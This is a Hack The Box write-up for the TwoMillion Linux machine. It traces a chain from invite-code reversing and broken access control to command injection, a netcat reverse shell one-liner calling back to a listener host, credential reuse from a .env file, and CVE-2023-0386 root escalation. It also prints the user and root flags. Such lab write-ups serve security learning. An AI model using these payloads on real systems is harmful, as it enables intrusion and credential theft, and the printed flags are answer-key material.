← ./writeups

Hack The Box

TwoMillion

HTBEasyLinuxWebAPIRCE

Summary

TwoMillion is an Easy Linux machine based on the old HTB invite flow. The client-side invite logic is reversed to register an account, then a Broken Access Control flaw on /api/v1/admin/settings/update promotes the account to admin. An admin-only VPN endpoint is vulnerable to command injection, yielding a shell as www-data. Credentials in a .env file allow SSH as admin, and the CVE-2023-0386 OverlayFS/FUSE kernel bug escalates to root.

Machine Information

NameDifficultyOSPlatform
TwoMillionEasyLinuxHack The Box

Attack Path

  1. Web application on port 80 with exposed /api/v1/ endpoints.
  2. Reverse the client-side invite-code logic to register.
  3. Broken Access Control promotes the account to admin.
  4. Command injection on the admin VPN endpoint gives a shell.
  5. Credentials exposed in a .env file allow SSH as admin.
  6. Privilege escalation via CVE-2023-0386.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.27.255

Nmap Scan

PortServiceNotes
22SSHOpenSSH 8.9p1 Ubuntu
80HTTPnginx, app at 2million.htb

Web Enumeration

The site used an invite-based registration flow. The /invite route loaded an obfuscated JavaScript file (inviteapi.min.js) containing a makeInviteCode() function. Deobfuscating it revealed the invite API logic.

Deobfuscation

/api/v1/invite/how/to/generate

The endpoint returned an encoded message; after ROT13 and Base64 decoding it pointed to the code used to register an account.

Decoded invite

Exploitation — Broken Access Control

After registering and logging in, manual enumeration revealed administrative endpoints under /api/v1/admin.

API structure leak

The /api/v1/admin/settings/update endpoint allowed changing account properties, including the admin flag, without proper authorization. Sending the correct JSON body promoted the account to admin.

Set admin

This is a classic Broken Access Control flaw.

Command Injection

With admin privileges, the /api/v1/admin/vpn/generate endpoint was reachable and vulnerable to command injection.

ninjaa;id;

Command injection

uid=33(www-data) gid=33(www-data) groups=33(www-data)

A reverse shell payload was injected:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.233 1337 >/tmp/f

Initial Access

A listener received the shell as www-data.

nc -nlvp 1337

Reverse shell

Local enumeration found a .env file with database credentials:

cat .env

.env file

DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

These were reused to authenticate over SSH as admin:

ssh admin@2million.htb

Privilege Escalation

Enumeration

A mail in admin's mailbox referenced upcoming kernel patches for an OverlayFS/FUSE vulnerability.

cat /var/mail/admin

Admin mail

This pointed directly at CVE-2023-0386.

Exploiting CVE-2023-0386

The exploit was transferred to the target and run, producing a root shell.

# attacker
python3 -m http.server 8000

Privilege escalation

Flags

User

cat /home/admin/user.txt

User flag

5a28a32104c5f20858e360d9c80b0608

Root

cat /root/root.txt

Root flag

3d2e9a0f27d1212fd9f2aee37627d7c4

Vulnerabilities Identified

Sensitive Logic Exposed in JavaScript

Impact: unauthenticated account registration.

Broken Access Control

Impact: privilege escalation within the application.

Command Injection

Impact: remote code execution as www-data.

Credential Exposure

Impact: pivot to an interactive system account.

Kernel Vulnerability (CVE-2023-0386)

Impact: full system compromise.

Tools Used

Key Takeaways